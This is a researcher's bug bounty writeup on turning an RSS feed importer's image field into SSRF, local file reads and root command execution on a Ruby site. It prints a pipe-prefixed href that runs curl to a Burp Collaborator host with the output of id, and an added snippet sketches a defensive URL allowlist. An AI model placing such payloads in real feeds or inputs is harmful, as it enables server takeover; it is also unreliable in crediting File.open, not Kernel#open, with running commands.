My name is Yazeed Alhourani (zerox4) :)

One year since my first writeup. I don't write a lot, I'm a little bit lazy, but today I'd like to share with you an awesome vulnerability I found on a REDACTED website :)

When I started researching a website that helps people share their podcasts across several platforms … that's all not important. On that website I found an option to retrieve podcasts from an RSS feed. All looked normal until then, but when I was intercepting the requests and checking the response, I found something that stopped me for about 5 minutes.


As you can see, there is a feed_url parameter that contains the RSS feed URL, all normal, but the show_image parameter in the response stopped me … I was thinking, does it convert the RSS feed to an image with all the XML tags??? - NOOO, of course NO :))

So I downloaded the RSS feed file, opened it in a text editor, and found this XML tag:

<itunes:image href="http://imagelink" />

When I found this tag, I opened the image link in the browser, compared it to that base64-encoded JPG image, and found that it's the same image.

I said coooooooooool!!! I tried to achieve SSRF and succeeded, but the SSRF didn't lead me to anything important. I always seek secrets and dive deeeep! No AWS metadata or anything ====> that's all. After that I copied the same RSS feed, uploaded it on my own VPS, and tried it instead of the original RSS feed, changing the image link in "<itunes:image href="http://imagelink" />"; the server was retrieving the image data.

And when I was trying to change the image link, I added a semicolon (;) by accident, and an interesting error appeared :))

No such file or directory @ rb_sysopen

Hmmmm


So I found that it's a Ruby application; I knew that before :)

I don't have any knowledge of Ruby and hadn't tried coding in it before, but that didn't stop me. I searched for this error and found that it belongs to the File.open() method in "RUBY". I said, okay, that's awesome, let's try to read local files.

I changed the image link in that XML tag to "<itunes:image href="/etc/passwd" />",

saved the RSS file on my own VPS, sent it to the RSS validator and hit send in Burp ….. Yaaaay

It fetched the local file from the website server (/etc/passwd), that's cool.

And when I was searching about Ruby and this file system method, I found that Ruby works weirdly and in magical ways: if you add a single pipe, like this, File.open("/etc/passwd | <OS_COMMAND>"), we can run OS commands,

but how???

In Ruby, if a path string starts with a pipe (|), Ruby thinks the rest of the string is an OS command, spawns a new subprocess, and we can run OS commands.
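An added example of my own (not the target application's code) showing the defensive side of the behavior described above: the command spawning belongs to Ruby's bare open (Kernel#open), while File.open treats the same string as a literal filename and simply fails with ENOENT, so a feed importer should validate the href as an absolute http(s) URL and never pass it to Kernel#open. The hrefs and hostnames below are constructed placeholders.

```ruby
require 'uri'

# Constructed hrefs mirroring the writeup's progression: a normal remote
# image, a local path (file read), and a leading-pipe string (which
# Kernel#open would execute as an OS command).
SAMPLE_HREFS = [
  'http://cdn.example.invalid/cover.jpg',
  '/etc/passwd',
  '| curl http://collaborator.invalid/$(id)',
].freeze

# Returns a URI only for absolute http(s) URLs with a host.
# Local paths, file:// URLs and pipe strings all return nil.
def safe_image_uri(href)
  return nil if href.nil?
  s = href.strip
  return nil if s.start_with?('|')   # Kernel#open would spawn a subprocess here
  uri = URI.parse(s)
  return nil unless uri.is_a?(URI::HTTP) && uri.host && !uri.host.empty?
  uri
rescue URI::InvalidURIError
  nil
end

# File.open never interprets a leading pipe; a pipe string is just a
# filename that does not exist. Returns the exception class raised, or
# :opened if the path really existed.
def file_open_outcome(path)
  File.open(path) { :opened }
rescue SystemCallError => e
  e.class
end

# Classify each href as :allowed or :rejected by the allowlist above.
def classify(hrefs)
  hrefs.map { |h| [h, safe_image_uri(h) ? :allowed : :rejected] }.to_h
end

if __FILE__ == $PROGRAM_NAME
  classify(SAMPLE_HREFS).each { |h, v| puts "#{v}: #{h}" }
  puts "File.open on pipe string -> #{file_open_outcome('| echo test')}"
end
```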

Okay, let's give it a try :)

<itunes:image href="| curl http://burpcollaboratorID.oastify.com/$(id)" />

Hit send in Burp and poll Collaborator :)

We got a request in Collaborator :)))

GET /uid=0(root) HTTP/1.1
Host: burpcollaboratorID.oastify.com
User-Agent: curl/7.88.1
Accept: */*

Yaaaay


And that's all, guys. That's how I found an RCE vulnerability via the RSS validator.

I hope you enjoyed it and that all was clear and simple.

Thanks.